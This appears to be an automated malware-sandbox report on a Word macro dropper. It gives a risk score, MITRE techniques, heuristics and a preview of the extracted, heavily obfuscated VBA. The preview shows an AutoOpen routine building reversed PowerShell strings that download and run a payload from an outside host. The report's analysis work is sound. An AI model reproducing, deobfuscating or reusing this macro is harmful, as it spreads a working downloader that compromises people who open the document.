MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a Microsoft Office document containing a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The Autoopen macro is present, and ClamAV detected it as Doc.Dropper.Agent-6547892-0. The VBA script is heavily obfuscated but the presence of the Shell() call strongly suggests it is designed to execute arbitrary commands, likely to download and run a secondary payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6547218-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6547218-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 163151 bytes |
SHA-256: 85905b8bc2fda5ebba9347df38aa6bde671623518e0513c9436372dbba2a8745 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wqnslXI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub hAEVJ(DLozw)
cZRiGP = KMPzI
SZjwz = (KqkXO / zhGlam / 77976 / Fix(nbJDcA)) + 7403 - CLng(nJRBvB + CLng(81682)) + TMoklo + 84602 * CuGhv - CStr(48305) / dKVjrP / CLng(VzKiCb)
End Sub
Sub NnwqX(OzDCw)
HAhtWj = XoqaU
TnqpaC = (QwpHIq / HXfGS / 65606 / Fix(IfnFo)) + 2727 - CLng(DRWNdr + CLng(8296)) + XIdzNS + 21713 * akfIH - CStr(1003) / kHmqK / CLng(DjlBz)
fTtfw = dzWdS
pwVNU = (sjDHm / rAtWU / 47607 / Fix(wPGjrh)) + 11138 - CLng(oiAmGo + CLng(33452)) + OmpOc + 16731 * JXhno - CStr(96145) / GfwlUF / CLng(QdjPdD)
CUfRZ = fjiJPp
wIKtRi = (XUoVT / SzIJz / 97729 / Fix(OGCBW)) + 27798 - CLng(vXBoVf + CLng(13739)) + HTnzup + 60865 * jJzNjh - CStr(51528) / KRkkp / CLng(IWDjS)
End Sub
Sub TAAoEj(pWCDOi)
WrZAS = whdEu
wBLQu = (WfOfJ / Jzslz / 15225 / Fix(VCQkQ)) + 93075 - CLng(QFDlW + CLng(91858)) + hjoiGI + 85053 * CKqhRr - CStr(36871) / KjVqY / CLng(jRuUr)
RccJON = PEHrzV
zGtjiL = (ksCAEV / DWjlQ / 94613 / Fix(ZhhTDP)) + 6441 - CLng(DsWVu + CLng(39962)) + XLpfz + 61994 * aIJsNM - CStr(64631) / FiXCZ / CLng(MPbvu)
End Sub
Sub Autoopen()
On Error Resume Next
oJiia = dzYwlz
pGYKLB = (ifmnws / BKvOjD / 23113 / Fix(RiaRVi)) + 66273 - CLng(JzYHkS + CLng(77032)) + PuDlJ + 44317 * kizcod - CStr(65208) / wiupu / CLng(ujIAjc)
CatJiJE (ZlKiWq + bTSYqLPscYJO + pAamun)
iXGuVb = cYqdtV
Nukcu = (KzmtR / jLvIHu / 14091 / Fix(LJBGLA)) + 86166 - CLng(MUFdUc + CLng(54360)) + qKzli + 71721 * Mcjslj - CStr(31542) / imbJEs / CLng(RtINkS)
End Sub
Sub oSGjpS(vVPaYp)
bIHQwl = qsTXM
tGcRA = (XoRlC / wlnQMj / 61023 / Fix(BplBw)) + 78489 - CLng(RzZnLd + CLng(12422)) + oszaG + 34533 * KXFazA - CStr(69085) / fjsJKE / CLng(bULlG)
rzrNrh = XPJZlM
NvWrfh = (tDTTv / TRcOUL / 94493 / Fix(ZOMFS)) + 72106 - CLng(QaSYw + CLng(49198)) + fwUGY + 39952 * tXuwif - CStr(12334) / uEZPLo / CLng(JlNwUc)
AuzaMl = tOncUf
SJkGwi = (OzjOSz / jscAVQ / 45822 / Fix(wHSUIA)) + 81145 - CLng(mrIrqb + CLng(54494)) + XzzmvO + 23242 * noKVKb - CStr(97253) / STLcn / CLng(WfXMwX)
End Sub
Sub GwIQm(YSlDkv)
hTqUb = stZXP
CwbSOj = (pihpC / Xwawj / 30605 / Fix(jNuCoD)) + 71494 - CLng(iRhasR + CLng(70786)) + wAXUSG + 82641 * dnPDMS - CStr(92934) / HoSoBY / CLng(KzjKRz)
End Sub
Attribute VB_Name = "JnnRdwIvJ"
Sub WuYAnh(MUoTD)
wfXWMW = wZzOib
uozjM = (sRGAcX / IwwKw / 12142 / Fix(qmFZvZ)) + 45545 - CLng(zuJWLQ + CLng(58076)) + UFHYG + 59435 * XtpFd - CStr(96518) / oSXmaH / CLng(anmHOU)
End Sub
Function bTSYqLPscYJO()
On Error Resume Next
qGLzd = bFpijL
hfFUu = (UGqzZq / ouRUQ / 83668 / Fix(MjniF)) + 98698 - CLng(AjdpC + CLng(28109)) + BuhSNi + 99031 * zHlJH - CStr(73252) / nUSrAC / CLng(rbOvH)
toWFfB = rUaufY
HzoiPA = (krHpM / uISrn / 78906 / Fix(iiPTq)) + 81478 - CLng(zZOMfZ + CLng(76091)) + EazoN + 63400 * zOQSh - CStr(96485) / BiHqzv / CLng(hVoZZ)
AhNjCLqZV = SaDjF("U2tBFy'+'g+FygedFyg+FygenimeFyg+FygsFyg+Fygaj//Fyg+Fyg:sptthFyg+Fyg@/B27vRFyg+Fyg/mocFyg+Fyg.tsewgnitFyg+Fy'+'gekrameFyg+FyggFyg+Fygami//:pttFyg+Fygh hlP Fyg+Fyg= XCDA5Fyg+Fyggs;)33128Fyg+Fyg2 ,00001(Fakuj@", 5927 + 6 - 5927, 5927 + 197 - 5927)
KcvKm = kEsrwb
WkBDXI = (PXfEpZ / lWFLPn / 41612 / Fix(VSGfBN)) + 57507 - CLng(rIPGZ + CLng(78310)) + RRQzvm + 93093 * UMozhn - CStr(62170) / nWXPiw / CLng(HOlOov)
tJBOjV = dXwLDf
iSwph = (ZXUzC / lVFjTv / 54973 / Fix(zHSaXt)) + 12687 - CLng(KtNojC + CLng(77184)) + rpFPJ + 41809 * BMvjKY - CStr(77872) / PbrDaA / CLng(RoSlN)
XaViUPjEVS = SaDjF("IBFyglPtFyg+'+'FyghlP+Fyg+FyghlPcejbo-wFyg+FyghlFyg+FygP+hlPeh'+'lP+hlFy'+'g+FygPnhl'+'Fyg+FygP(& = dsadasnFyg+'+'Fyg5gsFyg(('( ( )''niOj-]52,51,4[CepsMOc:VNe$ ( .VNmuIw", 50107 + 7 - 50107, 50107 + 161 - 50107)
lOHjhA = dqMibS
NbKvP = (QwMow / FVYRz / 45970 / Fix(OPzoA)) + 56790 - CLng(wAZON + CLng(54089)) + jIpdX + 42570 * KnBSkT - CStr(89865) / EZPGT / CLng(AQnKS)
tfBzD = ZOIBG
LXlYw = (TZqCV / JnnoR / 39596 / Fi
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.